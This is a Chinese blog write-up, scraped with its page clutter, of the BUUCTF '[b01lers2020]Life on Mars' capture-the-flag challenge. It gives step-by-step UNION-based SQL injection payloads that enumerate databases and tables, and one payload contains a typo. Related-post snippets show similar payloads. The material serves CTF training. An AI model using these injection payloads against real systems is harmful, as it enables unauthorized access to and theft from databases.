BUUCTF__[b01lers2020]Life on Mars_题解

最新推荐文章于 2022-11-21 16:57:33 发布

风过江南乱

最新推荐文章于 2022-11-21 16:57:33 发布

阅读量898

点赞数 1

分类专栏： BUU做题记录

本文链接：https://blog.youkuaiyun.com/TM_1024/article/details/116463414

版权

SQL注入 mysql

解题

题目没有其它可用信息，抓包发现可疑传参，可以测试出存在sql注入。注意一点是，在burp抓包修改在url路径中不能出现空格，不然会出现400错误，所以我们用/**/代替空格。

测试出回显位数为2

/query?search=chryse_planitia/**/union/**/select/**/1,2

所有数据库名称information_schema,alien_code,aliens

/query?search=chryse_planitia/**/union/**/select/**/1,group_concat(schema_name)/**/from/**/information_echema.schema

当前数据库aliens

/query?search=chryse_planitia/**/union/**/select/**/1,database()

表名amazonis_planitia,arabia_terra,chryse_planitia,hellas_basin,hesperia_planum,noachis_terra,olympus_mons,tharsis_rise,utopia_basin

/query?search=chryse_planitia/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()

字段名

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

风过江南乱

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
4
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

BUUCTF-CRYPTO-[b01lers2020]safety_in_numbers

zippo1234的博客

10-26

1052

BUUCTF-CRYPTO-[b01lers2020]safety_in_numbers[b01lers2020]safety_in_numbers题目分析开始1.题目2.分析（1）pubkey.pem（2）小端存储（3）解法3.上脚本：4.get flag结语每天一题，只能多不能少 [b01lers2020]safety_in_numbers 题目分析 1.pub.pem读取 2.n很大，或者说m^e相比于n很小。开始 1.题目给了三个文件 pubke.pem储存了n和e。 flag.enc是加密

BUUCTF [b01lers2020]little_engine

weixin_53349587的博客

01-06

457

1.拿到文件，进入主函数：这个是动调之前的主函数，开始动调：其中，已知字符串已经给出，为unk_5617CE521220，一共300位：进入加密函数sub_5608DAAB8510：通过多次动态调试，得到了加密算法的逻辑。看判断函数sub_5608DAAB85A0：综上，写出加密脚本： a = [0xE1, 0xE6, 0xD0, 0x4A, 0xF2, 0xC3, 0x7E, 0xAA, 0xE6, 0xFC, 0x42, 0xB2, 0xF..

4 条评论您还未登录，请先登录后发表或查看评论

b01lers-ctf-2020:b01lers-ctf的公开发布文件

05-17

b01lers-ctf b01lers-ctf的公开发布文件。您将找到以下目录： rev：Rev的挑战 pwn：Pwn挑战加密：加密挑战网络：网络挑战杂项：其他挑战分布式文件：我们在CTF期间分发供下载的tgz文件以及比赛的比分牌。所有挑战都应具有挑战文件，源代码以及编写和/或求解器。如果没有，请创建一个github问题，我们将修复该问题。如果您需要更多帮助，请随时与b01lers-ctf discord上的DM创建者联系。没有承诺，他们会回应，我们很忙。

BUUCTF-[b01lers2020]Life on Mars

qq_24033605的博客

11-04

3020

[b01lers2020]Life on Mars 审视了一下页面的功能，这几个功能键只能改变页面显示，连跳转都没有。扫描了一下，没有其他任何页面。这是猜想是不是框架漏洞。利用了Bootstrap的漏洞也没用，只能抓包看一下，不抓不知道，一抓吓一跳找到了sql注入的注入点，测试了一下，似乎存在waf，不能有空格，于是常规用/**/替换空格。爆破数据库名 union/**/select/**/1,group_concat(SCHEMA_NAME)/**/from/**/information_s

BUUCTF--[b01lers2020]Life on Mars

qq_46263951的博客

07-22

574

进入页面后什么也没发现，通过抓包看到一个可以参数跟着参数走可以看到一个这样的页面看大佬的wp接下来使用联合查询进行探测当查询两个字段时可以正常显示 /query?search=amazonis_planitia union select 1,2 使用sqlmap扫描扫描到这几个库，看名字应该是在alien_code中扫描该库的表扫描该表的列名然后使用sqlmap --dump 不出来内容，只好手动成功获得flag...

BUUCTF：[b01lers2020]Life on Mars

末初 - mochu7

08-01

2310

题目地址：https://buuoj.cn/challenges#[b01lers2020]Life%20on%20Mars 一个关于火星生命的科普站，目录扫描啥都没发现，用burp抓两个包分析一下，发现几个可疑传参 /query?search=如果地名输入正确，发现返回如下 order by判断字段，2字段时回显正确 union联合查询：/query?search=amazonis_planitia union select 111,222 回显点如图所示：查库：/query?search=a

[b01lers2020]Life on Mars

m0_62092622的博客

04-14

1564

打开是个火星生物的网站点旁边的一些链接也并没有什么思路不过抓包查看看到几个GET传递的参数，猜测这就是注入的点而我们抓其他几个链接，也是基本相同的参数，并且删除后两个参数是没有影响的，所以可以锁定注入点为search 但是我直接用bp来注入是不管用的，所以我们用hackerbar来传参先进入网页 http://c502b4f4-55bd-4e8e-8721-d3c8c6119c16.node4.buuoj.cn:81/query?search=amazonis_plani.

刷题记录之BUUCTF[b01lers2020]Welcome to Earth

SHININGENDING的博客

04-08

437

刷题记录之BUUCTF[b01lers2020]Welcome to Earth

安恒ctf misc crypto 培训资料合集

10-06

安恒ctf misc crypto合集加解密rsa 隐写图片隐写现代密码古典密码 ppt

[b01lers2020]Life on Mars （难发现的sql注入）

qq_62046696的博客

11-21

660

打开界面以后，查看各种都没有提示，果断扫描目录，但也是没获得什么。到这里只能burp抓个包看看抓包两个界面发现了get传参，考虑是否存在sql注入尝试额以后发现只返回了一个1，试一下别的引号闭合直接进行查询所有的数据库名看一下alien_code数据库发现code表 ?search=hesperia_planum/**/union/**/select/**/group_concat(id),group_concat(code)/**/from/**/alien_code.cod

[b01lers2020]Life on Mars WRITE UP

Swee

09-21

481

拿到网站没啥好说的，基本是静态的页面，先抓包。发现包有问题，search参数非常的奇怪经初步判定有SQL注入 ORDER BY 2 得到有两个参数进行联合查询,得到所有数据库的名称发现有个贼奇怪的叫alien_code 进去看看 /query?search=amazonis_planitia%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_sc